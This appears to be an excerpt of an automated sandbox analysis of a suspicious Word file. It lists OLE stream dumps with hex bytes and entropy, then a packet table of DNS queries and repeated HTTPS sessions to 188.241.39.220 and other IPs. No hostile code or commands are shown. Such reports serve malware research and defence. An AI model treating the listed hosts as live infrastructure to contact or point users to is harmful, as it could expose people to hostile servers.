Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/i03/f, File Type: data, Stream Size: 40

General
Stream Path:	ObjectPool/_1587790099/i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 e3 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1587790099/i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	ObjectPool/_1587790099/i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: ObjectPool/_1587790099/o, File Type: data, Stream Size: 148

General
Stream Path:	ObjectPool/_1587790099/o
File Type:	data
Stream Size:	148
Entropy:	2.71220072885
Base64 Encoded:	False
Data ASCII:	. . l . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 4 . . . . . . . .
Data Raw:	00 02 6c 00 31 80 fa 00 00 00 00 00 18 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 7f 00 00 00 7f 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 f0 00 00 00

Stream Path: ObjectPool/_1587790099/x, File Type: data, Stream Size: 48

General
Stream Path:	ObjectPool/_1587790099/x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Stream Path: WordDocument, File Type: data, Stream Size: 312719

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	312719
Entropy:	7.93695261581
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . @ . . . . . . . L . . . . . . . L . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . 8 . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 0c 19 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 8f c5 04 00 62 7f 00 00 62 7f 00 00 2e 0f 00 00 06 01 00 00 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2018 13:45:25.876578093 MESZ	63700	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:25.995949984 MESZ	53	63700	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:26.007379055 MESZ	54244	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:26.118120909 MESZ	53	54244	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:26.119465113 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:26.119499922 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.119556904 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:26.153896093 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:26.153928041 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.535152912 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.535176039 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.535346031 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:26.548640013 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:26.548683882 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.549771070 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.751030922 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:26.755137920 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:27.445785999 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:27.483005047 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.662472010 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.710000038 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.710026026 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.710033894 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.710042953 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.710170031 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:27.710196018 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.711158037 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:27.711183071 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.711293936 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:27.711405993 MESZ	443	49162	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:27.711483955 MESZ	49162	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.013514042 MESZ	60413	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:28.111138105 MESZ	53	60413	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:28.136696100 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.136750937 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.136823893 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.147959948 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.147994995 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.311511040 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.311537027 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.311647892 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.324280024 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.324306965 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.325006962 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.325086117 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.555201054 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.557406902 MESZ	49912	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:28.594997883 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.759601116 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.759746075 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.759783030 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.760556936 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.819011927 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.819098949 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.819113016 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.819132090 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.819611073 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.819632053 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.820408106 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.820489883 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.820540905 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.820552111 MESZ	443	49163	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:28.820816994 MESZ	49163	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:28.939400911 MESZ	53	49912	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:30.818237066 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:31.816508055 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:32.816221952 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:34.816581011 MESZ	62993	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:36.043857098 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.067980051 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.068027973 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.068063021 MESZ	53	62993	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:36.122752905 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:36.122838020 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:36.123625994 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:36.263190985 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:36.263243914 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.682986975 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.683010101 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.683018923 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.683053017 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.683156967 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:37.683186054 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.686674118 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:37.686706066 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.687256098 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.891010046 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:37.891119003 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:38.115591049 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:38.155003071 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:38.611005068 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:38.815033913 MESZ	443	49164	204.79.197.213	192.168.1.81
Jun 19, 2018 13:45:38.815228939 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:38.837697029 MESZ	49164	443	192.168.1.81	204.79.197.213
Jun 19, 2018 13:45:38.880671024 MESZ	58780	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:39.077951908 MESZ	53	58780	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:39.079302073 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.079356909 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.080576897 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.081950903 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.081996918 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.461630106 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.461651087 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.461662054 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.461716890 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.461740017 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.461761951 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.463084936 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.464613914 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.464632988 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.465221882 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.484236956 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.527017117 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.986521959 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.986700058 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:39.986773968 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:39.986810923 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.040963888 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.040987968 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.041003942 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.041016102 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.041178942 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:40.041202068 MESZ	443	49165	131.253.33.213	192.168.1.81
Jun 19, 2018 13:45:40.042511940 MESZ	49165	443	192.168.1.81	131.253.33.213
Jun 19, 2018 13:45:42.684019089 MESZ	54934	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:42.930069923 MESZ	53	54934	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:46.172106981 MESZ	62845	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:46.252887011 MESZ	53	62845	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:46.296124935 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:46.296194077 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.296333075 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:46.321152925 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:46.321214914 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.606024981 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.606036901 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.606204033 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:46.609292030 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:46.609318018 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.612145901 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.815009117 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:46.815212965 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:47.135009050 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:47.175003052 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.923145056 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.974013090 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.974049091 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.974056959 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.974065065 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.974208117 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:52.974232912 MESZ	443	49169	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:52.977606058 MESZ	49169	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.107327938 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.107404947 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:55.107503891 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.108792067 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.108819008 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:55.497823000 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:55.512972116 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.513011932 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:55.513263941 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:55.513279915 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:58.625226974 MESZ	57200	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:58.789825916 MESZ	53	57200	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:58.794080973 MESZ	53499	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:58.888606071 MESZ	53	53499	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:59.248717070 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:59.298362017 MESZ	62060	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:59.410604954 MESZ	53	62060	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:59.415369034 MESZ	51380	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:45:59.450995922 MESZ	443	49177	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:59.451204062 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:59.454354048 MESZ	49177	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:59.552336931 MESZ	53	51380	8.8.8.8	192.168.1.81
Jun 19, 2018 13:45:59.976394892 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:59.976470947 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:45:59.976985931 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:59.978017092 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:45:59.978034019 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:00.202291965 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:00.284183025 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:00.284215927 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:00.284446001 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:00.284463882 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.511854887 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570286989 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570313931 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570334911 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570348978 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570362091 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570379972 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.570468903 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:19.570503950 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603456020 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603487968 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603496075 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603506088 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603513956 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.603712082 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:19.603739023 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.645852089 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.645872116 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.645894051 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.645906925 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.645922899 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.646269083 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:19.646312952 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685741901 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685761929 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685775995 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685789108 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685801983 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.685894012 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:19.685925007 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.717413902 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.717433929 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.717446089 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.717573881 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:19.717608929 MESZ	443	49183	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:19.738274097 MESZ	49183	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:21.077790022 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:21.077827930 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:21.077935934 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:21.078974009 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:21.079005957 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:24.356558084 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:24.371833086 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:24.371869087 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:28.178056955 MESZ	55175	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:28.278707027 MESZ	53	55175	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:28.294118881 MESZ	65476	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:28.386775970 MESZ	53	65476	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:29.663191080 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.754976034 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755029917 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755050898 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755065918 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755085945 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755105972 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755211115 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.755260944 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:29.755304098 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.757934093 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:29.757956028 MESZ	443	49194	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:29.759711981 MESZ	49194	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:30.582876921 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:30.582923889 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:30.582994938 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:30.584074020 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:30.584098101 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:31.879457951 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:31.896377087 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:31.896406889 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:31.896647930 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:31.896672010 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.110461950 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:33.110495090 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.110589027 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:33.111654043 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:33.111682892 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.324006081 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.341228008 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:33.341258049 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.543037891 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.581504107 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.581542015 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.581578016 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.583175898 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:33.583200932 MESZ	443	49197	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:33.587764025 MESZ	49197	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:38.305830002 MESZ	52882	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:38.353993893 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:38.354165077 MESZ	443	49196	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:38.354288101 MESZ	49196	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:38.424603939 MESZ	53	52882	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:39.030488968 MESZ	49433	53	192.168.1.81	8.8.8.8
Jun 19, 2018 13:46:39.256655931 MESZ	53	49433	8.8.8.8	192.168.1.81
Jun 19, 2018 13:46:39.257889032 MESZ	49204	443	192.168.1.81	188.241.39.220
Jun 19, 2018 13:46:39.257936954 MESZ	443	49204	188.241.39.220	192.168.1.81
Jun 19, 2018 13:46:39.258014917 MESZ	49204	443	192.168.1.81	188.241.39.220
